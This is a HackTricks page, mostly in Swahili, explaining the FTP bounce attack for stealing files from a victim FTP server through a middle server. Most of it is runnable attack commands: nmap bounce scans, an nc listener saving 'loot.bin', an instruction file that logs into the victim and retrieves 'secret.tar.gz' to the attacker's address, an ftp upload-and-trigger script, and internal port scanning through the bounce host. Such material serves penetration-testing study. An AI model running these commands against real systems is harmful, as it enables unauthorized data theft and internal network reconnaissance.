FTP Bounce Kupakua 2 ya FTP File
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari
Ikiwa una ufikiaji wa bounce FTP server, unaweza kuifanya iombe faili za another FTP server (ambapo unajua baadhi ya credentials) na kupakua faili hiyo kwenye server yako mwenyewe.
Mahitaji
- FTP valid credentials in the FTP Middle server
- FTP valid credentials in Victim FTP server
- Both servers accept the
PORTcommand (bounce FTP attack) - Unaweza kuandika ndani ya saraka fulani ya FTP Middle server
- The middle server ina access zaidi ndani ya Victim FTP Server kuliko wewe
Hatua
- Ungana na your own FTP server na fanya muunganisho kuwa passive (
pasvcommand) ili iweze kusikiliza katika saraka ambapo service ya victim itatuma faili. - Tengeneza faili ambayo FTP Middle server itapeleka kwa Victim server (the exploit script). Faili hii itakuwa plain text yenye amri zinazohitajika kuhalalisha dhidi ya Victim server, kubadilisha directory na kupakua faili kwenye server yako mwenyewe.
- Ungana na FTP Middle Server na upload faili uliotengenezwa hapo juu.
- Fanya FTP Middle server ianzishe muunganisho na Victim server na itume exploit file.
- Pokea faili kwenye your own FTP server.
- Futa exploit file kutoka kwa FTP Middle server.
Ukaguzi wa haraka kwa bounce hosts zilizo hatarini
- Nmap bado inaunga mkono ukaguzi wa FTP bounce. Mfano kuthibitisha potential middle server:
nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
# or directly attempt a bounce scan
nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>
If the server refuses third‑party PORT values the scan will fail; some vichapishi vya zamani/vyenye kujengwa ndani, NAS na daemon za FTP za appliance bado zinaruhusu.
Kuendesha kiotomatiki upakuaji wa pili wa FTP
Hapa chini ni njia ya kisasa ya kuvuta faili kupitia server ya kati ya FTP iliyo hatarini.
- Fungua msikilizaji pasivu kwenye mashine yako ya shambulio (sink yoyote ya TCP inafaa):
nc -lvnp 2121 > loot.bin # or run a small pyftpdlib server
-
Tambua IP yako kama
A,B,C,Dna portPkamap1,p2(p1 = P/256,p2 = P%256). -
Tengeneza faili la maagizo ambalo server ya kati itarejesha kwa korban:
cat > instrs <<'EOF'
USER <victim_user>
PASS <victim_pass>
CWD /path/inside/victim
TYPE I
PORT A,B,C,D,p1,p2
RETR secret.tar.gz
QUIT
EOF
# Add padding so the control channel stays open on picky daemons
dd if=/dev/zero bs=1024 count=60 >> instrs
- Pakia & chochea kutoka server ya kati (classic proxy FTP):
ftp -n <middle_ftp> <<'EOF'
user <middle_user> <middle_pass>
put instrs
PORT <victim_ip_with_commas>,0,21
RETR instrs
QUIT
EOF
- Pata faili kutoka kwa msikilizaji wako (
loot.bin). - Safisha faili iliyopakiwa
instrskwenye server ya kati.
Notes:
- Padding (
dd ...) inazuia muunganisho wa udhibiti kufungwa kabla ya RETR kumalizika (tatizo la dirisha kubwa la TCP linalojadiliwa katika maandishi ya zamani). - Huduma yoyote inayoweza kusikiliza na kumwaga TCP inaweza kubadilisha socket ya FTP PASV (mfano,
socat -u TCP-LISTEN:2121,fork - > loot.bin). - Ikiwa server ya kati inadhibiti bandari zenye hadhi, tumia bandari ya juu katika
PORTna rekebisha msikilizaji wako ipasavyo.
Mbinu za ziada
- Tumia server ya FTP inayoweza ku-bounce kufanya port-scan internal hosts wakati kuhamisha faili kumeremwa:
nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
- Baadhi ya WAF/IDS za kisasa (mfano, Juniper IPS) zina saini maalum kwa FTP:EXPLOIT:BOUNCE-ATTACK; payload zenye kelele au kukosa padding zinaweza kusababisha kuzitambua.
- Wakati server ya kati inatekeleza vikwazo vya “PORT to same host”, weka msikilizaji wako kwenye server ya kati mwenyewe (ikiwa una uwezo wa kuandika/kuendesha) na peleka faili iliyopatikana baadaye.
Kwa mwendo wa kina wa mtindo wa zamani angalia: http://www.ouah.org/ftpbounce.html
References
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.


